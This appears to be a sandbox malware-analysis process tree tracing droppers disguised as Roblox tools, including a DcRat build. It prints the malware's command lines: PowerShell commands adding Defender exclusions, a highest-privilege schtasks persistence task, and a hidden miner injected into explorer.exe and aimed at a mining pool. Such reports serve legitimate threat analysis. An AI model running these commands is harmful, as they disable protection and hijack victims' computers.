C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xe8,0x1b8,0x7ffec26b3cb8,0x7ffec26b3cc8,0x7ffec26b3cd86⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:26⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=1920 /prefetch:36⤵PID:5800
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2504 /prefetch:86⤵PID:5876
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:16⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4468 /prefetch:86⤵PID:5696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"4⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\sppsvc.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\msiexec.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dwm.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:1540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\SearchHost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:3808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Bloxstrap.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sihost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\OfficeClickToRun.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:4064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:2112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GI7AJm8Pkj.bat"8⤵PID:5548
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:5652
-
-
C:\DriversavessessionDlldhcp\SearchHost.exe"C:\DriversavessessionDlldhcp\SearchHost.exe"9⤵
- Executes dropped EXE
PID:1476
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"2⤵
- DcRat
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"3⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "4⤵PID:5424
-
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"5⤵
- Executes dropped EXE
- Modifies registry class
PID:3112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zxhe5InkWx.bat"6⤵PID:1120
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:2892
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:5564
-
-
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet\ComContainerbrowserRefRuntime.exe"7⤵
- Executes dropped EXE
PID:6128
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"2⤵
- Executes dropped EXE
PID:1444 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵PID:6024
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵PID:6120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5392
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"4⤵PID:2080
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:392
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"4⤵PID:1304
-
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe5⤵
- Executes dropped EXE
PID:1016 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"6⤵
- Suspicious use of SetThreadContext
PID:5004 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵PID:4092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:5720
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
PID:5132 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵PID:1972
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth7⤵PID:5712
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"3⤵PID:5060
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "4⤵PID:3908
-
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:5836 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\loheq4ac\loheq4ac.cmdline"6⤵PID:1176
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3757.tmp" "c:\Users\Default User\CSC3FE150F924B4925B9D2092F72F386E.TMP"7⤵PID:4776
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gy3050f\4gy3050f.cmdline"6⤵PID:276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37D4.tmp" "c:\winNet\CSC3819460273F4426F84D8BB51F11D638.TMP"7⤵PID:5952
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\df25lzqd\df25lzqd.cmdline"6⤵PID:2820
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3832.tmp" "c:\Program Files\Uninstall Information\CSC880CA798E664626A5A38DB655CC4F.TMP"7⤵PID:2112
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\byxgeu4u\byxgeu4u.cmdline"6⤵PID:4748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES388F.tmp" "c:\Program Files (x86)\Windows Photo Viewer\en-US\CSCF15A0D27F8EA4CDFBC1DE8BF698648A.TMP"7⤵PID:4756
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1z35jtl5\1z35jtl5.cmdline"6⤵
- Drops file in Windows directory
PID:1716 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38FD.tmp" "c:\Windows\PrintDialog\Assets\CSCEA7B6E856AE41B3B5E0A1592D23E056.TMP"7⤵PID:5864
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nfrvli0k\nfrvli0k.cmdline"6⤵PID:5288
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES396A.tmp" "c:\Users\Default\My Documents\CSC1EEA76721C33491DBF5A770652E75AA.TMP"7⤵PID:5512
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s0pk5drk\s0pk5drk.cmdline"6⤵PID:5516
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39C8.tmp" "c:\Users\Default\AppData\Roaming\Microsoft\CSC7EBEBB9C69F644668F96E96FCAD24F.TMP"7⤵PID:3464
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzyziqsh\hzyziqsh.cmdline"6⤵PID:5956
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A35.tmp" "c:\Recovery\WindowsRE\CSCBC55AF23D3ED47C1B0F23D506375AC11.TMP"7⤵PID:5852
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13sxzenz\13sxzenz.cmdline"6⤵PID:2912
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A83.tmp" "c:\winNet\CSCCDABDA6FBD3144BFAE6242C5FF4F7337.TMP"7⤵PID:676
-
-
-
